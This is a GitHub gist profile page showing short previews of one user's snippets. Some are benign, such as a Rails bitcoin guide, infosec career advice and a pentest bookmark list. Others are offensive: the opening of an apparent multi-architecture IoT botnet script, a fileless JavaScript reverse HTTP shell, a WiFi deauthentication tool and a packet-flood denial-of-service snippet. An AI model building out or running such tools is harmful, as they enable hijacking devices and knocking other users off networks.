Skip to content

Instantly share code, notes, and snippets.

View tofuseng's full-sized avatar

t͡ɕ∱ບຮɐດອ² tofuseng

  • 0x91EA74C6B1991B5B
View GitHub Profile
@tofuseng
tofuseng / Article.md
Created April 3, 2018 05:48
Step-by-step guide how to accept bitcoin in Rails website ☺️

Accept bitcoin in website

Bitcoin is a decentralised digital currency which has been growing rapidly in popularity and use. You can send bitcoins to people and businesses around the world quickly, easily, and with much less fees than international wire transfers, PayPal, or Visa, e.t.c.

This is a step-by-step guide, how to accept bitcoin in your website without using the full node or third-party service like blockchain.info or blocktrail.com or any other bitcoin-wallet site.

#!/bin/bash
#########################################
###############Botnames##################
#########################################
L1='jackmymipsel' #mipsel
L2='jackmymips' #mips
L3='jackmysh4' #sh4
L4='jackmyx86' #x86_64
L5='jackmyarmv6' #armv6l
L6='jackmyi686' #i686
@tofuseng
tofuseng / JSRat.ps1
Created December 31, 2015 06:11
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.
@tofuseng
tofuseng / reverseip.py
Created December 18, 2015 07:58
Reverse IP lookup - Find domains on the same server
#!/usr/bin/env python
import urllib2, urllib, sys, json
from optparse import OptionParser
# Terminal Colors
class bc:
P = '\033[95m' # purple
@tofuseng
tofuseng / wifikill.py
Created December 18, 2015 07:56
A python program to kick people off of wifi
#!/usr/bin/env python
###############################################################################
# Wifi Kill #
# Robert Glew #
# https://github.com/roglew/wifikill #
# This python script can be used to kick anyone or everyone off of your wifi #
# network. The script must be run as sudo in order to send the required #
# packets. Have fun. #
###############################################################################
# DDoS any WiFi network or ethernet interface you're connected do, drowning out other people's legitimate traffic with spam malformed packets
# brew install libdnet; pip install dnet
# sudo python bringitdown.py
import dnet
def bring_it_down(iface="en0", spam_packet='HOST:all|GET:spam'):
datalink = dnet.eth(iface)
h = datalink.get().encode('hex_codec')
#!/usr/bin/perl
use strict;
use warnings;
use Mojo::UserAgent;
use Mojo::Server::Daemon;
use Bloom::Filter;
my $bloom_filter = Bloom::Filter->new( error_rate => 0.001, capacity => 100000 );
my $ua = Mojo::UserAgent->new;
@tofuseng
tofuseng / gist:67b07d84def662989b51
Created November 14, 2015 19:29 — forked from david415/gist:120f157f62d20b11e39f
secret onion git http repo! fuck github. no masters. no sys admins. only the secret police know how cool i am.
virtualenv virtenv-txtorcon
. ./virtenv-txtorcon/bin/activate
pip install txtorcon
export project=myproject
export secret=`pwgen 64`
mkdir -p public_html/$secret
cp -a $project public_html/$secret
touch public_html/index.html
@tofuseng
tofuseng / Getting_started.md
Created November 13, 2015 22:04
Getting started in information security…. notes to a student

http://blog.pentestify.com/2014/03/07/getting-started-in-security-a-message-to-a-student/

Recently had a college student reach out for advice, and thought i’d share with the class:

My biggest issue with my current education is the broad scale and lack of clear direction on how to achieve my goals. I know that I am very interested in penetration testing. Ethical hacking in general is a very big interest of mine. But as for what area of security, I’m not even sure what the options are.

Cool – sounds like the biggest thing is to explore your options, and decide on a direction knowing full well this may change as you learn more.

@tofuseng
tofuseng / bookmarklist.md
Created October 19, 2015 00:52
wtf-stuff

#summary Bookmarks List = Hacker Media =

== Blogs Worth It: == What the title says. There are a LOT of pentesting blogs, these are the ones i monitor constantly and value in the actual day to day testing work.

* http://carnal0wnage.blogspot.com/
* http://www.mcgrewsecurity.com/
* http://www.gnucitizen.org/blog/